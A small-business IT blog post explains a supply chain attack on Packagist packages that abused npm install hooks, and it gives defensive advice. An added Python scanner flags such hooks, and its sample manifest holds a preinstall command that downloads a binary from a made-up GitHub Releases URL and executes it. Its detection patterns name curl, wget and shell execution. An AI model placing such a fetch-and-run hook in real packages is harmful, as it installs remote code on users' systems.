
Cyber Attack via Software Packages: What This Means for Your SME

By Assist2go, 9 June 2026

Source: The Hacker News

How Software Packages Become a Weak Link

Software development relies heavily on reusing existing pieces of code, usually called 'packages'. This greatly speeds up the building of websites and applications. Companies pull these packages, most of them free, from public repositories such as Packagist, the main package repository for PHP, so that developers can work quickly and efficiently.

Unfortunately, this dependency on external code also makes your business vulnerable.

A coordinated attack that exploits this reuse has recently been discovered. Eight packages on Packagist were found to carry malicious code. Attacks of this kind, where criminals infiltrate your systems through the software you legitimately install rather than by attacking you directly, are called 'supply chain attacks'.

They pose a growing threat to businesses of all sizes.

How the Attack Works Explained

In this specific attack, the malicious elements were not added to the main configuration file of a PHP package (composer.json), but to a file that belongs to the JavaScript world: package.json. That file is the manifest used by npm, the package manager for Node.js and JavaScript, and it can declare commands that npm runs automatically when a package is installed.

This is a clever move by the attackers. Anyone reviewing a PHP package looks at its composer.json and its PHP source, not at a stray package.json. The choice also matters technically: Composer only runs scripts declared by the project's own composer.json and ignores those of its dependencies, whereas npm automatically runs the install-time scripts of every package it installs. Projects that combine PHP with a JavaScript toolchain, as many modern web applications do, were therefore the ones exposed.

The infected packages contained instructions that caused an additional, malicious program to be downloaded. This program was a so-called 'Linux binary', an executable file built to run on Linux, the operating system most web servers use. The download came from an external location, namely a GitHub Releases URL.

GitHub is a platform where developers worldwide share and manage their code, and the 'Releases' section is often used to make new versions of software available.

Hosting the Linux malware on GitHub as a 'release' is deliberate. Downloads from github.com look like ordinary developer traffic and are rarely blocked, so the file blends in with legitimate software and is harder for security systems to notice. Once running on a server, such a program can do anything its privileges allow, from stealing sensitive information to taking full control of the server that hosts the website.

The coordinated nature of the attack suggests a professional operation behind the scenes, aimed at maximizing impact.
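The mechanism described above, a package.json whose install-time scripts fetch and run a binary from GitHub Releases, can be checked for with a short scanner. The example below is added here and is not code from the original post or from The Hacker News report; it walks a project or vendor/ directory, reads every package.json, and flags npm lifecycle hooks (preinstall, install, postinstall, prepare) that reference remote downloads or execute what they fetched. The two sample manifests and the github.com URL inside them are constructed for the demonstration and do not refer to the real packages.

```python
"""Scan a directory tree for package.json files whose npm lifecycle scripts
download or execute remote content.

Added example, not code from the original article or the report it summarises.
The sample manifests and the GitHub URL below are constructed for the demo."""
import json
import os
import re
import tempfile
from pathlib import Path

# npm runs these hooks automatically during `npm install` (unless --ignore-scripts)
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Indicators that a hook fetches or runs something from outside the package
DOWNLOAD_RE = re.compile(r"\b(curl|wget|fetch)\b|https?://", re.IGNORECASE)
EXEC_RE = re.compile(r"chmod\s+\+x|\bbash\b|\bsh\s+-c|\bnode\s+-e\b")
RELEASE_RE = re.compile(r"github\.com/[^\s'\"]+/releases/download/", re.IGNORECASE)


def inspect_manifest(path):
    """Return a list of findings (file, hook, command, reasons) for one package.json."""
    try:
        with open(path, encoding="utf-8") as fh:
            manifest = json.load(fh)
    except (OSError, ValueError):
        return []  # unreadable or not JSON: nothing npm would run
    scripts = manifest.get("scripts") or {}
    if not isinstance(scripts, dict):
        return []
    findings = []
    for hook in LIFECYCLE_HOOKS:
        cmd = scripts.get(hook)
        if not isinstance(cmd, str):
            continue
        reasons = []
        if RELEASE_RE.search(cmd):
            reasons.append("downloads from GitHub Releases")
        elif DOWNLOAD_RE.search(cmd):
            reasons.append("fetches remote content")
        if EXEC_RE.search(cmd):
            reasons.append("executes a fetched file or inline shell")
        if reasons:
            findings.append({"file": str(path), "hook": hook, "command": cmd, "reasons": reasons})
    return findings


def scan_tree(root):
    """Walk root (a project, vendor/ or node_modules/ directory) and inspect every package.json.
    Nested vendor/ and node_modules/ are deliberately not skipped: dependency manifests live there."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        if "package.json" in filenames:
            findings.extend(inspect_manifest(Path(dirpath) / "package.json"))
    return findings


# Constructed sample manifests for an offline demo (hypothetical package names and URL).
SAMPLE_BENIGN = {
    "name": "acme/widget",
    "scripts": {"build": "webpack --mode production", "test": "jest"},
}
SAMPLE_MALICIOUS = {
    "name": "acme/helpers",
    "scripts": {
        # modelled on the "Linux binary from GitHub Releases" pattern; URL is made up
        "preinstall": "curl -sL https://github.com/example-org/example/releases/download/v1.0/agent"
                      " -o /tmp/.a && chmod +x /tmp/.a && /tmp/.a"
    },
}


def build_demo_tree():
    """Write the two sample manifests into a temporary vendor/ layout and return its root."""
    root = Path(tempfile.mkdtemp(prefix="pkgscan-"))
    for rel, manifest in (("vendor/acme/widget", SAMPLE_BENIGN), ("vendor/acme/helpers", SAMPLE_MALICIOUS)):
        pkg_dir = root / rel
        pkg_dir.mkdir(parents=True)
        (pkg_dir / "package.json").write_text(json.dumps(manifest, indent=2), encoding="utf-8")
    return root


def run_demo():
    """Build the demo tree and scan it; returns the findings list."""
    return scan_tree(build_demo_tree())


if __name__ == "__main__":
    for f in run_demo():
        print(f"{f['file']}: {f['hook']} -> {', '.join(f['reasons'])}")
        print(f"    {f['command']}")
```

On a real system, call scan_tree on the project root (including vendor/ and node_modules/) and treat any hit as something to review by hand before running an install. The matching hardening is to stop npm running these hooks at all, with `npm install --ignore-scripts` or `ignore-scripts=true` in the project's .npmrc, and to only re-enable them for packages that demonstrably need them; the scanner is a detection aid, not a substitute for that setting.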

What Does This Mean for Your SME Business?

As an SME, you may rely on similar software packages to run your website, online store, or internal applications. The risks of such an attack are significant and can have far-reaching consequences:

  • Data Theft: Sensitive customer data, financial information, or trade secrets can fall into the wrong hands. This can lead to identity fraud, financial damage, and reputational damage.

  • Business Interruption: The malicious code can make your systems inaccessible, resulting in a website being offline or applications no longer working. This can lead to lost revenue and dissatisfied customers.

  • System Takeover: Hackers can gain control of your servers, allowing them to misuse the systems for further criminal activities, such as launching other attacks.

  • Reputational Damage: A data breach or other security incidents can severely damage the trust of your customers and partners. Restoring this trust can be time-consuming and costly.

  • Financial Costs: In addition to direct damage, there can also be costs for system cleanup, forensic investigation, legal advice, and informing affected parties.

It is crucial to take the risks of external software components seriously. Even if your business does not develop software itself, the website you run or the applications your employees use almost certainly depend on packages like these, pulled in by your web builder or IT partner.

How Can Your SME Protect Itself?

The complexity of modern software means that writing all the code yourself is often not feasible. Therefore, it's important to manage risks smartly. Here are some direct steps you can take:

  • Check Your Software Suppliers: Ask your web builder or IT partner which packages they use and how they ensure their security. A transparent supplier is a good sign.

  • Keep Software Up-to-Date: Ensure that all software used, including underlying frameworks and libraries, is kept up-to-date, since developers regularly release updates that patch security vulnerabilities. Do this in a controlled way: pin versions with lock files (composer.lock, package-lock.json) and review what an update pulls in, because in a supply chain attack the malicious code arrives disguised as the 'new version'.

  • Use Security Scanners: There are tools that check your software for known vulnerable or malicious components; Composer and npm ship their own (composer audit, npm audit), and checking packages for install-time scripts that download or run files catches the pattern used in this attack. Ask your IT partner about the possibilities.

  • Minimize Dependencies: Only use the software packages you truly need. The fewer external components your system uses, the smaller the attack surface.

  • Implement a Security Policy: Establish clear rules within your organization about software usage and security. Educate your employees about the risks.

  • Regular Backups: Maintain reliable, off-site or offline backups of your website and data that an attacker who has taken over the server cannot reach or alter. If something does go wrong, you can restore your systems quickly.

  • Network Segmentation: Separate sensitive systems from less critical systems. This can prevent an attack from spreading rapidly throughout your entire network.

Conclusion

The recent supply chain attack on Packagist is a clear warning that malicious actors are using increasingly sophisticated methods to attack businesses. For SMEs, it is essential to be proactive. Understanding the risks, regular updates, and working with trusted IT partners are key to protecting your digital business operations.

Take security seriously, because a small weak link can cause major problems.

**Want to know more?** Also see how Assist2go can help with the right IT service for your business.
